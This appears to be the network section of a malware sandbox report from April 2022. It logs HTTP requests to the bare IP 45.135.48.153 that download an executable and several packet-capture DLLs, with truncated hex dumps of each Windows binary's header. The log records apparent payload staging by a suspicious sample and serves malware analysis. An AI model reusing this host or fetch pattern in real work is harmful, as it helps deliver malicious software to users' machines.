42 1e 12 67 4d 40 12 a5 42 1e 12 67 4d 44 12 a5 42 1e 12 52 69 63 68 a4 42 1e 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a0 6a 6b 47 00 00 00 00 00 00 00 00 e0 00 0f 0d 0b 01 07 0a 00 86 00 00 00 1a 00 00 00 00 00 00 ff 63 00 00 00 20 00 00 00 c0 00 00 00 00 00 01 00 20 00 00 00 02 00 00 05 00 02 00 05 00 02 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 52 0d 57 00 02 00 00 80 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 98 00 00 a0 00 00 00 00 e0 01 00 b4 17 00 00 00 00 00 00 00 00 00 00 00 7c 56 00 58 17 00 00 00 00 00 00 00 00 00 00 20 22 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 26 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e 84 00 00 00 20 00 00 00 86 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f8 13 01 00 00 c0 00 00 00 02 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 17 00 00 00 e0 01 00 00 f0 55 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 9d 00 00 56 9d 00 00 3a 9d 00 00 22 9d 00 00 10 9d 00 00 fa 9c 00 00 de 9c 00 00 ca 9c 00 00 b4 9c 00 00 a4 9c 00 00 8a 9c 00 00 7c 9d 00 00 00 00 00 00 11 00 00 80 00 00 00 00 f6 a1 00 00 e8 a1 00 00 cc a1 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#pABBBgMBBBgMCBgMABgM@BgMDBRichBPELjkGc RW \|VX "&@ .text `.data@.rsrcU@@lV:"\|
Apr 19, 2022 16:44:43.834784031 CEST	8166	OUT	GET /Vv/1/vcredist_2013_x64.exe HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:44.132772923 CEST	8168	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 09 Nov 2021 09:06:22 GMT Accept-Ranges: bytes ETag: "0bbaf1049d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:43 GMT Content-Length: 7195976 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f f8 56 af 0b 99 38 fc 0b 99 38 fc 0b 99 38 fc 10 04 a6 fc 19 99 38 fc 10 04 92 fc 6e 99 38 fc 02 e1 bb fc 0e 99 38 fc 02 e1 ab fc 14 99 38 fc 0b 99 39 fc 49 98 38 fc 10 04 93 fc 6c 99 38 fc 10 04 a2 fc 0a 99 38 fc 0b 99 af fc 0a 99 38 fc 10 04 a5 fc 0a 99 38 fc 52 69 63 68 0b 99 38 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c ef 5f 53 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 8c 03 00 00 2c 02 00 00 00 00 00 1e 7e 02 00 00 10 00 00 00 a0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 06 00 00 04 00 00 d6 bc 6e 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 21 05 00 2c 01 00 00 00 a0 05 00 e4 37 00 00 00 00 00 00 00 00 00 00 98 8e 6d 00 b0 3e 00 00 00 e0 05 00 24 32 00 00 f0 a4 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1b 05 00 18 00 00 00 d8 1a 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 8b 03 00 00 10 00 00 00 8c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 9a 01 00 00 a0 03 00 00 9c 01 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 30 00 00 00 40 05 00 00 10 00 00 00 2c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 78 62 75 72 6e 38 00 00 00 00 80 05 00 00 02 00 00 00 3c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 05 00 00 02 00 00 00 3e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 37 00 00 00 a0 05 00 00 38 00 00 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fa 42 00 00 00 e0 05 00 00 44 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 6a 00 6a 00 6a 01 6a 00 ff 15 8c a2 43 00 83 65 fc 00 8d 45 fc 50 ff 75 14 ff 75 10 ff 75 08 e8 1e 0b 00 00 85 c0 78 03 8b 45 fc c9 c2 10 00 55 8b ec 51 83 65 fc 00 56 8b f0 83 8e 8c 04 00 00 ff 57 8b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$OV8888n8889I8l8888Rich8PEL_S,~@0n@t!,7m>$2 @.textt `.rdata@@.data 0@,@.wixburn8<@@.tls>@.rsrc78@@@.relocBDx@BUQjjjjCeEPuuuxEUQeVW
Apr 19, 2022 16:44:45.698326111 CEST	15635	OUT	GET /Vv/1/PcapDotNet.Base_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:45.994390011 CEST	15636	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:45 GMT Content-Length: 12800 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 2a 00 00 00 06 00 00 00 00 00 00 8e 49 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 b6 f0 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 49 00 00 4b 00 00 00 00 60 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 9c 48 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 29 00 00 00 20 00 00 00 2a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 49 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 29 00 00 8c 1f 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 ac a6 fe e9 b8 67 38 51 5d 37 fd ac ac d5 9c 0d 7e d5 84 3f 0e ae 19 6d cb 4e 5b 9c b0 21 a4 ff 2e 5e 01 ed 4f 4a bf f0 ee 90 48 66 5e 97 3e d8 d1 e4 29 6e f0 2f ef 4b 6a 68 09 48 3a b9 23 96 39 12 b2 d3 6c 98 7c 56 4c 6a de 3d 05 6f 73 52 df c9 1c 7e 9a d5 8e a6 9f 52 cd 31 8b b6 f0 de 5b e9 84 5c 68 de 79 74 94 af a5 79 52 6e d9 ec 41 d2 97 57 22 fa 91 5f 04 53 b8 54 24 b9 53 1e 02 73 09 00 00 06 2a 22 0f 00 28 0a 00 00 06 2a 86 02 7b 04 00 00 04 0f 01 7b 04 00 00 04 33 10 02 7b 03 00 00 04 0f 01 7b 03 00 00 04 fe 01 2a 16 2a 5e 03 75 02 00 00 02 2c 0d 02 03 a5 02 00 00 02 28 03 00 00 06 2a 16 2a 26 0f 00 03 28 03 00 00 06 2a 2e 02 03 28 05 00 00 06 16 fe 01 2a 32 02 71 02 00 00 02 28 02 00 00 06 2a 00 00 13 30 02 00 19 00 00 00 01 00 00 11 02 71 02 00 00 02 28 02 00 00 06 0a 12 00 28 15 00 00 0a 28 16 00 00 0a 2a 52 02 03 1f 10 63 d2 7d 04 00 00 04 02 03 d1 7d 03 00 00 04 2a 46 02 7b 04 00 00 04 1f 10 62 02 7b 03 00 00 04 58 2a 42 20 ff ff ff 00 28 01 00 00 06 80 02 00 00 04 2a 76 02 2d 0b 72 01 00 00 70 73 17 00 00 0a 7a 02 6f 18 00 00 0a 6f 19 00 00 0a 16 fe 01 2a 36 02 03 74 01 00 00 1b 28 01 00 00 2b 2a 00 00 00 1b 30 02 00 6d 00 00 00 02 00 00 11 02 2d 0b 72 01 00 00 70 73 17 00 00 0a 7a 73 1b 00 00 0a 0a 06 04 6f 1c 00 00 0a 26 17 0b 02 6f 18 00 00 0a 0d 2b 23 09 6f 1d 00 00 0a 0c 07 2c 04 16 0b 2b 08 06 03 6f 1c 00 00 0a 26 06 08 8c 03 00 00 1b 6f 1e 00 00 0a 26 09 6f 19 00 00 0a 2d d5 de 0a 09 2c 06 09 6f 1f 00 00 0a dc 06 05 6f 1c 00 00 0a 26 06 6f 20 00 00 0a 2a 00 00 00 01 10 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[L!I `@ @@IK`H H.text) `.rsrc`,@@.reloc0@BpIH)P g8Q]7~?mN[!.^OJHf^>)n/KjhH:#9l\|VLj=osR~R1[\hytyRnAW"_ST$Ss"({{3{{^u,(&(.(2q(0q(((Rc}}F{b{XB (v-rpszoo6t(+0m-rpszso&o+#o,+o&o&o-,oo&o
Apr 19, 2022 16:44:46.402275085 CEST	15649	OUT	GET /Vv/1/PcapDotNet.Core_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:46.698191881 CEST	15650	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:45 GMT Content-Length: 72704 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 18 41 5c 9e 79 2f 0f 9e 79 2f 0f 9e 79 2f 0f 97 01 bc 0f 9c 79 2f 0f 80 2b bc 0f 9c 79 2f 0f f1 0f b3 0f 9b 79 2f 0f 0d 37 b7 0f 9f 79 2f 0f f1 0f 85 0f 97 79 2f 0f b9 bf 54 0f 9c 79 2f 0f 9e 79 2e 0f c9 79 2f 0f f1 0f 84 0f bb 79 2f 0f f1 0f b2 0f 9f 79 2f 0f 52 69 63 68 9e 79 2f 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 d6 5b 09 4c 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 4c 00 00 00 cc 00 00 00 00 00 00 6c 57 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 01 00 00 04 00 00 6f b6 01 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 28 01 00 78 00 00 00 00 60 01 00 b4 01 00 00 00 50 01 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 28 00 00 00 60 73 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 c8 02 00 00 00 00 00 00 00 00 00 00 7c 73 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0f 49 00 00 00 10 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 6e 65 70 00 00 00 00 50 00 00 00 00 60 00 00 00 02 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 c2 00 00 00 70 00 00 00 c4 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 05 00 00 00 40 01 00 00 02 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f0 00 00 00 00 50 01 00 00 02 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b4 01 00 00 00 60 01 00 00 02 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 01 00 00 00 70 01 00 00 02 00 00 00 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 01 00 07 00 00 00 00 00 00 00 02 7b 4a 00 00 04 2a cc 03 30 01 00 07 00 00 00 00 00 00 00 02 7b 4b 00 00 04 2a cc 03 30 01 00 07 00 00 00 00 00 00 00 02 7b 4c 00 00 04 2a cc 03 30 01 00 07 00 00 00 00 00 00 00 02 7b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A\y/y/y/y/+y/y/7y/y/Ty/y.y/y/y/Richy/PEd[L" LlWo@(x`Pp(`sp\|sH.textIJ `.nepP`N `.rdataRpP@@.data@@.pdataP@@.rsrc`@@.relocp@B0{J0{K0{L*0{
Apr 19, 2022 16:44:46.992784023 CEST	15724	OUT	GET /Vv/1/PcapDotNet.Core.Extensions_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:47.288676023 CEST	15726	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:46 GMT Content-Length: 11264 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 22 00 00 00 08 00 00 00 00 00 00 de 41 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 fe a5 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 41 00 00 4f 00 00 00 00 60 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 d0 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 21 00 00 00 20 00 00 00 22 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 04 00 00 00 60 00 00 00 06 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 41 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 25 00 00 3c 1b 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 5b 3a 40 b2 ee 38 54 8b 8f fb 25 40 5e 73 f2 8c 21 80 83 0e 21 01 18 d5 4c 39 ad 23 20 1e 6f b9 dc aa 9c e4 90 72 c9 c9 09 b3 09 04 91 b9 ca 18 2f 3a 8f fd 0f d4 4f 82 52 03 9a ed 5c da 7d 97 5e 54 fa 92 49 20 d4 73 50 0f 1a a6 5e 47 af e8 f3 79 a9 b8 bb 61 fb eb a7 61 20 5e 7a 95 ce 55 56 46 46 12 6e 33 af 7c 3e d5 8a 9c 28 e6 71 bf 30 7d 21 d8 ef 8c 94 ef 54 d4 8d f5 3b b0 24 13 30 05 00 67 00 00 00 01 00 00 11 02 2d 0b 72 01 00 00 70 73 14 00 00 0a 7a 02 6f 15 00 00 0a 0a 06 72 23 00 00 70 1a 6f 16 00 00 0a 2d 2e 28 17 00 00 0a 72 4d 00 00 70 18 8d 01 00 00 01 0b 07 16 02 6f 15 00 00 0a a2 07 17 72 23 00 00 70 a2 07 28 18 00 00 0a 73 19 00 00 0a 7a 02 6f 15 00 00 0a 72 23 00 00 70 6f 1a 00 00 0a 6f 1b 00 00 0a 2a 00 1b 30 04 00 51 00 00 00 02 00 00 11 02 28 01 00 00 06 0a 7e 1c 00 00 0a 72 bf 00 00 70 06 72 62 01 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 0b 07 72 7a 01 00 70 6f 1f 00 00 0a 75 1e 00 00 01 0c 08 2d 0b 72 96 01 00 70 73 19 00 00 0a 7a 08 0d de 0a 07 2c 06 07 6f 20 00 00 0a dc 09 2a 00 00 00 01 10 00 00 02 00 22 00 23 45 00 0a 00 00 00 00 1e 02 28 21 00 00 0a 2a 4a 03 6f 22 00 00 0a 02 7b 03 00 00 04 28 23 00 00 0a 2a 00 13 30 04 00 37 00 00 00 03 00 00 11 73 08 00 00 06 0a 02 2d 0b 72 01 00 00 70 73 14 00 00 0a 7a 06 02 28 01 00 00 06 7d 03 00 00 04 28 24 00 00 0a 06 fe 06 09 00 00 06 73 25 00 00 0a 28 01 00 00 2b 2a 00 13 30 03 00 2b 00 00 00 04 00 00 11 02 28 03 00 00 06 0a 06 2c 1a 06 6f 27 00 00 0a 6f 28 00 00 0a 0b 07 16 17 28 29 00 00 0a 73 2a 00 00 0a 2a 02 28 05 00 00 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[L!"A `@ @AO` @ H.text! " `.rsrc `$@@.reloc@BAH%<P [:@8T%@^s!!L9# or/:OR\}^TI sP^Gyaa ^zUVFFn3\|>(q0}!T;$0g-rpszor#po-.(rMpor#p(szor#poo0Q(~rprbp(orzpou-rpsz,o "#E(!Jo"{(#07s-rpsz(}($s%(+0+(,o'o(()s**(
Apr 19, 2022 16:44:47.502846003 CEST	15737	OUT	GET /Vv/1/PcapDotNet.Packets_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:47.799354076 CEST	15738	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Tue, 09 Nov 2021 09:06:20 GMT Accept-Ranges: bytes ETag: "08e7ef49d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:46 GMT Content-Length: 157184 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 af 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 5e 02 00 00 06 00 00 00 00 00 00 3e 7c 02 00 00 20 00 00 00 80 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 02 00 00 02 00 00 e4 6c 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 7b 02 00 4b 00 00 00 00 80 02 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 0c 00 00 00 44 7b 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 5c 02 00 00 20 00 00 00 5e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 80 02 00 00 04 00 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 02 00 00 02 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 7c 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 b7 00 00 70 c3 01 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 df ba d6 2d 66 01 7c fe fa e9 e8 aa 5d 83 ff 3f a3 6d 3f 3f 41 30 23 4a dd ad 3b 3e 2c 64 7d 43 38 3b 4f 81 18 29 03 aa 4a 4c 3c 3c 0c bd f6 48 29 8b d0 bc b6 e8 a8 cf fa c6 60 b4 ee 86 2a 85 a0 28 d4 a1 40 f6 55 12 c8 c6 52 f4 28 f8 41 0b 3b 60 4f 4e 4c a6 bc 4b 5f 0c 07 ed ff 2f f9 36 6a 6c 11 e1 db b3 26 9d 66 8b 3e df 18 9e f3 4e 61 1e 9d cd 37 2d 08 54 5c b3 b0 04 3e e3 1a 1e 02 28 18 00 00 